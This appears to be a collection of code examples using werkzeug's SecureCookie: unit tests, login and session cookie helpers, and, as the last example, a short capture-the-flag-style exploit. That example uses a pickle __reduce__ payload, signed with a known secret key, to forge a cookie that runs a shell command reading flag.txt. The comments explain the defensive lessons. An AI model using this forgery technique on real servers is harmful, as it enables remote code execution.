示例#1
def test_basic_support():
    """Round-trip a SecureCookie and check its state flags and key handling."""
    # A freshly built cookie is new and has nothing to persist.
    original = SecureCookie(secret_key=b'foo')
    assert original.new
    assert not original.modified
    assert not original.should_save

    # Writing a key marks the cookie dirty so it gets saved.
    original['x'] = 42
    assert original.modified
    assert original.should_save
    wire = original.serialize()

    # Same key: a distinct object with equal contents and clean flags.
    restored = SecureCookie.unserialize(wire, b'foo')
    assert original is not restored
    assert not restored.new
    assert not restored.modified
    assert not restored.should_save
    assert restored == original

    # Wrong key: no exception, the payload is discarded and the cookie
    # comes back empty. Callers only see "empty", not "tampered".
    rejected = SecureCookie.unserialize(wire, b'wrong foo')
    assert not rejected.modified
    assert not rejected.new
    assert rejected == {}

    # A text-type key and constructor-supplied data round-trip as well.
    seeded = SecureCookie({'x': 42}, 'foo')
    seeded_wire = seeded.serialize()
    assert SecureCookie.unserialize(seeded_wire, 'foo') == seeded
示例#2
def test_basic_support():
    """Check SecureCookie flags before/after mutation and across unserialize."""
    fresh = SecureCookie(secret_key=b'foo')
    # Nothing has been written yet, so nothing needs saving.
    assert fresh.new
    assert not fresh.modified
    assert not fresh.should_save
    fresh['x'] = 42
    assert fresh.modified
    assert fresh.should_save
    token = fresh.serialize()

    # Loading with the signing key yields an equal but separate cookie.
    loaded = SecureCookie.unserialize(token, b'foo')
    assert fresh is not loaded
    assert not loaded.new
    assert not loaded.modified
    assert not loaded.should_save
    assert loaded == fresh

    # A key mismatch is handled by returning an empty, non-new cookie.
    mismatched = SecureCookie.unserialize(token, b'wrong foo')
    assert not mismatched.modified
    assert not mismatched.new
    assert mismatched == {}

    # Data passed to the constructor survives a round trip under a str key.
    prefilled = SecureCookie({'x': 42}, 'foo')
    prefilled_token = prefilled.serialize()
    assert SecureCookie.unserialize(prefilled_token, 'foo') == prefilled
示例#3
def test_basic_support():
    """Exercise SecureCookie creation, mutation, serialization and key checks."""
    # Stage 1: an empty cookie starts out new and unmodified.
    cookie = SecureCookie(secret_key=b"foo")
    assert cookie.new
    assert not cookie.modified
    assert not cookie.should_save

    # Stage 2: a write flips both dirty flags.
    cookie["x"] = 42
    assert cookie.modified
    assert cookie.should_save
    serialized = cookie.serialize()

    # Stage 3: the signing key restores the same contents in a new object.
    same_key = SecureCookie.unserialize(serialized, b"foo")
    assert cookie is not same_key
    assert not same_key.new
    assert not same_key.modified
    assert not same_key.should_save
    assert same_key == cookie

    # Stage 4: a different key fails verification and yields an empty
    # cookie instead of raising.
    other_key = SecureCookie.unserialize(serialized, b"wrong foo")
    assert not other_key.modified
    assert not other_key.new
    assert other_key == {}

    # Stage 5: constructor data with a str key also round-trips.
    with_data = SecureCookie({"x": 42}, "foo")
    with_data_serialized = with_data.serialize()
    assert SecureCookie.unserialize(with_data_serialized, "foo") == with_data
示例#4
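def saveOAuthToken(next, token, secret, max_age=3000):
    """Return a response for *next* that stores the OAuth token pair in a cookie.

    Args:
        next: Value handed to ``make_response`` to build the response.
        token: OAuth token to store.
        secret: OAuth token secret to store.
        max_age: Cookie lifetime in seconds, converted to an ``expires`` date.

    Returns:
        The response with the ``zapfauth_token`` cookie set.
    """
    signing_key = current_app.config['SECRET_KEY'].encode('utf-8')
    # SecureCookie signs its payload but does not encrypt it: the token and
    # its secret stay readable to anyone who obtains the cookie value.
    signed = SecureCookie({"token": token, "secret": secret}, signing_key)
    expires = datetime.utcnow() + timedelta(seconds=max_age)
    resp = make_response(next)
    # httponly keeps page scripts from reading the credentials through
    # document.cookie.
    # NOTE(review): also pass secure=True where the site is HTTPS-only.
    resp.set_cookie('zapfauth_token', signed.serialize(), expires=expires,
                    httponly=True)
    return resp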
示例#5
def fake_login(request):
    """Stub login view: GET shows a placeholder, POST sets a signed session cookie.

    Any other method falls through and returns ``None``.
    """
    method = request.method
    if method == 'GET':
        return Response("FAKE LOGIN", mimetype="text/html")
    if method != 'POST':
        return None

    logged_in = Response("LOGGED IN", mimetype="text/html")
    # The cookie is signed with SECRET_KEY, so the client cannot change the
    # flag without failing verification; the contents are not encrypted.
    signed = SecureCookie({"logged_in": True}, SECRET_KEY)
    # NOTE(review): no httponly/secure flags are set here; acceptable for a
    # stub, but a real login cookie should set both.
    logged_in.set_cookie('session_data', signed.serialize())
    return logged_in
示例#6
文件: utils.py 项目: IanLewis/kay
def set_gaema_user(service, user):
  """Persist *user* for *service* in a signed cookie or in the server session.

  The cookie backend is used only when ``settings.GAEMA_STORAGE`` exists and
  equals ``"cookie"``; otherwise the session backend is used.
  """
  storage_key = GAEMA_USER_KEY_FORMAT % service
  use_cookie = (hasattr(settings, "GAEMA_STORAGE")
                and settings.GAEMA_STORAGE == "cookie")
  if not use_cookie:
    from kay.sessions import renew_session
    # The session is renewed before the user is attached to it.
    renew_session(local.request)
    local.request.session[storage_key] = user
    local.request.session.modified = True
    return
  # Cookie backend: the whole user object travels to the browser, signed
  # with SECRET_KEY but not encrypted.
  # NOTE(review): confirm `user` holds nothing the client should not read.
  signed = SecureCookie(user, secret_key=settings.SECRET_KEY)
  set_cookie(storage_key, signed.serialize())
示例#7
def set_gaema_user(service, user):
    """Store the authenticated *user* for *service*.

    With ``settings.GAEMA_STORAGE == "cookie"`` the user is written to a
    signed cookie; in every other case it goes into the request session.
    """
    key = GAEMA_USER_KEY_FORMAT % service
    cookie_backend = hasattr(settings, "GAEMA_STORAGE") and \
        settings.GAEMA_STORAGE == "cookie"
    if cookie_backend:
        # Signed, not encrypted: the client can read this data but cannot
        # alter it without the secret key.
        serialized_user = SecureCookie(
            user, secret_key=settings.SECRET_KEY).serialize()
        set_cookie(key, serialized_user)
    else:
        from kay.sessions import renew_session
        current_request = local.request
        # Renew the session first, then attach the user to it.
        renew_session(current_request)
        local.request.session[key] = user
        local.request.session.modified = True
示例#8
def set_to_cookie(req_response, cookie, key, value):
    """Set *key* to *value* inside the signed cookie named *cookie*.

    The current cookie is read from the request, updated, and written back
    on *req_response*. The cookie name is also recorded in the session list
    stored under ``ALL_COOKIES_KEY``.
    """
    raw = request.cookies.get(cookie)
    signing_key = app.config["SECRET_KEY"]
    if raw is not None:
        # `raw` is client-supplied. unserialize() checks the signature
        # before decoding values, so the secret key is the only barrier
        # between this input and the deserializer (pickle by default in
        # werkzeug.contrib.securecookie).
        jar = SecureCookie.unserialize(raw, signing_key)
    else:
        jar = SecureCookie(secret_key=signing_key)
    jar[key] = value

    tracked = session.get(ALL_COOKIES_KEY, [])
    if cookie not in tracked:
        tracked.append(cookie)
    # Reassign so the session sees the change even if the list was mutated
    # in place.
    session[ALL_COOKIES_KEY] = tracked
    req_response.set_cookie(cookie, jar.serialize())
示例#9
 def post_process(self, environ, headers):
     """Append a Set-Cookie header reflecting the current user.

     With no current user, an existing cookie named ``self.name`` is
     overwritten with an empty, expired value. Otherwise a signed cookie
     carrying the user id and session token is emitted.
     """
     current = User.get_current()
     if not current:
         # Only emit a clearing header when the client actually sent one.
         if self.name in http.parse_cookie(environ):
             expired = http.dump_cookie(self.name, '', expires=1)
             headers.append((utils.to_native('Set-Cookie'), expired))
         return
     # The session token is signed with self.secret but not encrypted, so
     # whoever holds the cookie value holds the token.
     # NOTE(review): dump_cookie is called without httponly/secure; check
     # whether the deployment needs them.
     payload = {
         'uid': current.id,
         'session_token': current.get_session_token(),
     }
     signed = SecureCookie(payload, self.secret)
     header_value = http.dump_cookie(
         self.name, signed.serialize(),
         expires=self.expires, max_age=self.max_age)
     headers.append((utils.to_native('Set-Cookie'), header_value))
示例#10
 def post_process(self, environ, headers):
     """Emit the session cookie header for the response.

     Logged-out requests that still carry the cookie get an expiring
     Set-Cookie header; logged-in requests get a freshly signed cookie
     holding ``uid`` and ``session_token``.
     """
     active_user = User.get_current()
     if not active_user:
         request_cookies = http.parse_cookie(environ)
         if self.name in request_cookies:
             # Empty value plus expires=1 tells the browser to drop it.
             clearing = http.dump_cookie(self.name, '', expires=1)
             headers.append(('Set-Cookie', clearing))
         return
     # Signed with self.secret, not encrypted: treat the cookie value as
     # equivalent to the session token itself.
     # NOTE(review): no httponly/secure arguments are passed to dump_cookie.
     session_cookie = SecureCookie(
         {'uid': active_user.id,
          'session_token': active_user.get_session_token()},
         self.secret)
     set_cookie_value = http.dump_cookie(self.name,
                                         session_cookie.serialize(),
                                         expires=self.expires,
                                         max_age=self.max_age)
     headers.append(('Set-Cookie', set_cookie_value))
示例#11
    def test_basic_support(self):
        """Verify SecureCookie flags and round-trip behaviour with bytes keys."""
        # New cookie: nothing modified, nothing to save.
        source = SecureCookie(secret_key=b'foo')
        assert source.new
        assert not source.modified
        assert not source.should_save

        # A write makes the cookie dirty.
        source['x'] = 42
        assert source.modified
        assert source.should_save
        blob = source.serialize()

        # Matching key: equal contents, separate object, clean flags.
        verified = SecureCookie.unserialize(blob, b'foo')
        assert source is not verified
        assert not verified.new
        assert not verified.modified
        assert not verified.should_save
        self.assert_equal(verified, source)

        # Non-matching key: the data is dropped and an empty cookie returned.
        unverified = SecureCookie.unserialize(blob, b'wrong foo')
        assert not unverified.modified
        assert not unverified.new
        self.assert_equal(unverified, {})
示例#12
    def test_basic_support(self):
        """Verify SecureCookie flags and round-trip behaviour with a str key."""
        first = SecureCookie(secret_key='foo')
        # Untouched cookie: new, clean, not worth saving.
        assert first.new
        assert not first.modified
        assert not first.should_save
        first['x'] = 42
        # After one assignment both dirty flags are set.
        assert first.modified
        assert first.should_save
        encoded = first.serialize()

        # The right key gives back the same mapping in a new instance.
        second = SecureCookie.unserialize(encoded, 'foo')
        assert first is not second
        assert not second.new
        assert not second.modified
        assert not second.should_save
        assert second == first

        # The wrong key gives back an empty cookie rather than an error.
        third = SecureCookie.unserialize(encoded, 'wrong foo')
        assert not third.modified
        assert not third.new
        assert third == {}
示例#13
    def test_basic_support(self):
        """Check state flags and signature verification on a SecureCookie."""
        # Construction alone leaves the cookie new and unmodified.
        jar = SecureCookie(secret_key='foo')
        assert jar.new
        assert not jar.modified
        assert not jar.should_save

        # Mutation is tracked.
        jar['x'] = 42
        assert jar.modified
        assert jar.should_save
        dumped = jar.serialize()

        # Verification succeeds with the key used for signing.
        good = SecureCookie.unserialize(dumped, 'foo')
        assert jar is not good
        assert not good.new
        assert not good.modified
        assert not good.should_save
        assert good == jar

        # Verification fails with any other key; the result is empty.
        bad = SecureCookie.unserialize(dumped, 'wrong foo')
        assert not bad.modified
        assert not bad.new
        assert bad == {}
示例#14
    def test_basic_support(self):
        """Check SecureCookie lifecycle flags and bytes-key verification."""
        created = SecureCookie(secret_key=b'foo')
        # Before any write the cookie reports new/unmodified/no-save.
        assert created.new
        assert not created.modified
        assert not created.should_save
        created['x'] = 42
        assert created.modified
        assert created.should_save
        payload = created.serialize()

        # Round trip under the signing key.
        accepted = SecureCookie.unserialize(payload, b'foo')
        assert created is not accepted
        assert not accepted.new
        assert not accepted.modified
        assert not accepted.should_save
        self.assert_equal(accepted, created)

        # Round trip under a different key: contents are discarded.
        refused = SecureCookie.unserialize(payload, b'wrong foo')
        assert not refused.modified
        assert not refused.new
        self.assert_equal(refused, {})
示例#15
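    def test_basic_support(self):
        """Check SecureCookie state flags and key verification on a round trip.

        The leftover debug ``print`` statement was removed: it was Python 2
        only syntax and duplicated what the assertions already check.
        """
        c = SecureCookie(secret_key="foo")
        # A new cookie has no changes to persist.
        assert c.new
        assert not c.modified
        assert not c.should_save
        c["x"] = 42
        assert c.modified
        assert c.should_save
        s = c.serialize()

        # Same key: equal contents in a separate, clean object.
        c2 = SecureCookie.unserialize(s, "foo")
        assert c is not c2
        assert not c2.new
        assert not c2.modified
        assert not c2.should_save
        assert c2 == c

        # Wrong key: verification fails and an empty cookie is returned.
        c3 = SecureCookie.unserialize(s, "wrong foo")
        assert not c3.modified
        assert not c3.new
        assert c3 == {}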
示例#16
import os
import subprocess

from werkzeug.contrib.securecookie import SecureCookie

class RCE(object):
    # Object whose pickled form names a callable and its arguments rather
    # than plain data.
    def __reduce__(self):
        # pickle calls __reduce__ when dumping and, on load, invokes the
        # returned callable with the returned arguments. This is why
        # unpickling bytes that an outside party can influence is equivalent
        # to running their code.
        return (subprocess.check_output, (['cat','flag.txt'],))

# The signing key is the only thing that stops a client from submitting a
# cookie of its own making. This script works only because the key is known.
# Defensive takeaways: keep the key out of source and rotate it after any
# exposure, and subclass SecureCookie with a data-only serialization_method
# (e.g. json) so that a leaked key allows forgery but not code execution.
SECRET_KEY = 'superdupersecretflagonkey'

payload = {'name': RCE() , 'username': '******'}

# SecureCookie serializes each value (pickle by default in
# werkzeug.contrib.securecookie) and signs the result with SECRET_KEY.
x = SecureCookie(payload, SECRET_KEY)

value = x.serialize()
print(value)